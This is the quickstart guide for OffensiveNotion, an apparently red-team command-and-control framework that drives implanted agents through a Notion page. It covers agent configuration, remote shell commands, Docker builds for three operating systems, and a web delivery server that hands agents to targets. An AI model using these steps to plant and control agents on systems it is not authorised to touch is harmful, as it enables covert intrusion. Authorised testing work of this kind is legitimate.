2. Quickstart

TL;DR

How do I get this thing working so I can see what it can do?

Make a Notion account
Go to the Notion API developer page and log in. Create an Integration user (New integration). Copy that user's API key.
Create a page in your Notion book (any page will do). This is your "Listener." Copy the final part of the URL or press ctl+L in the Desktop app. This is your parent page ID. Keep track of it for a moment. Deck out your page with a banner and emoji icon. Have fun with it.

In the upper-right corner of your Notion page, click "Share" and "Invite." Add your Notion Developer API account to this page.
Download the Linux agent from the Release section.
Run the release agent in debug mode (-d) and input the values for each prompt.

husky@ubuntu:~/Desktop/OffensiveNotion/bin/linux_debug/debug$ ./offensive_notion -d
[*] Starting!
Getting config options!
[*] Enter agent sleep interval > 5
[*] Enter agent jitter time > 0
[*] Enter parent page id > [...your parent page ID..]
[*] Enter API Key > 
[...your API key...]
[*] Enter Config File Path > 
[leave blank]
[*] Enter Log Level (1-4) > 
2

Your agent should now check into your Listener page:

Run commands! Make a To-Do block (/todo in the Notion app), enter shell whoami 🎯, and watch the magic unfold.

See the Agent Interaction section for the full list of available commands.

Docker

The main way to build the OffensiveNotion agent with your own custom configurations is with Docker and the main.py script. This acts as the turn-key point for the entire operation.

With two Docker commands, you can build the container that compiles the agent, set all of its configs in the source code, compile it, and have it available on your physical host. Then, you can run the commands again and change the configs if you want.

Building and Running the Container

This works best on Linux. You'll need Docker, of course. Once you have Docker installed, clone the repo and change dirs into the repo.

Docker Build

To build the container:

$ sudo docker image build -t offensivenotion .

Docker Run

Use this Docker run command as a base:

sudo docker rm -r offensivenotion && sudo docker container run -v $(pwd):/out -it offensivenotion -o linux -b release

...where:

sudo docker rm -f offensivenotion removes any running instance of the container.
-v $(pwd):/out maps the OffensiveNotion repo on the host to the /out directory in the container. tl;dr: your agent will be there when it is done compiling.
-o linux -b release is the set of build script arguments.

Everything after -it offensivenotion is an argument to the main.py script. What's the main.py script, you say?

🟠 Important

Mounting the volume to the main directory of the repo is important so you can immediately get your agent out onto your physical host. You can also use the Docker copy command but that's pretty clumsy, tbh.

`main.py`

This script is the entrypoint of the container and handles everything you need to make an OffensiveNotion agent. It reads in the type of agent you want to make (Linux, Windows, or macOS), sets the configs in the source code, compiles the agent, and resets the source code for you.

It can also do some fun stuff like Web Delivery and a C2 check. More on these later.

Check out the full usage of main.py to see your options:

python3 main.py -h
usage: main.py [-h] [-o {linux,windows,macos}] [-b {debug,release}] [-c] [-w]
               [-m {powershell,wget-linux,wget-psh,python-linux,python-windows}] [-ip HOSTIP] [-p PORT]

OffensiveNotion Setup. Must be run as root. Generates the OffensiveNotion agent in a container.

optional arguments:
  -h, --help            show this help message and exit
  -o {linux,windows,macos}, --os {linux,windows,macos}
                        Target OS
  -b {debug,release}, --build {debug,release}
                        Binary build
  -c, --c2lint          C2 linter. Checks your C2 config by creating a test page on your Listener.
  -w, --webdelivery     Start a web delivery server to host and deliver your agent. Provides convenient one liners to run on the
                        target.
  -m {powershell,wget-linux,wget-psh,python-linux,python-windows}, --method {powershell,wget-linux,wget-psh,python-linux,python-windows}
                        Method of web delivery
  -ip HOSTIP, --hostIP HOSTIP
                        Web server host IP.
  -p PORT, --port PORT  Web server host port.

The only two arguments that are required are -o, for the OS, and -b, for the build (debug or release). The additional arguments are covered in the Misc section.

If you do not pass in the build and OS arguments, it defaults to a Linux debug agent.

Once the script is running, follow the prompts to perform the installation. At the end, you'll have an agent in the main directory of the repo

More Examples of Docker Run

I want to build a Linux debug agent for testing:

$ sudo docker rm -r offensivenotion && sudo docker container run -v $(pwd):/out -it offensivenotion

I want to make a Windows release agent:

$ sudo docker rm -r offensivenotion && sudo docker container run -v $(pwd):/out -it offensivenotion -o windows -b release

I wanna try out that cool macOS agent everyone is talking about, release build:

$ sudo docker rm -r offensivenotion && sudo docker container run -v $(pwd):/out -it offensivenotion -o macos -b release

I want to build a Linux release agent and check to make sure my API key and parent page are good:

$ sudo docker rm -r offensivenotion && sudo docker container run -v $(pwd):/out -it offensivenotion -o linux -b release --c2llint

I want to make a Windows release payload and host it for web delivery

(Beast of a command incoming)

$ sudo docker rm -f offensivenotion && sudo docker container run -p 80:80 -v $(pwd):/out -it --name offensivenotion offensivenotion -o windows -b release -w -ip 10.10.1.237 --port 80 -m powershell

(let's break it down)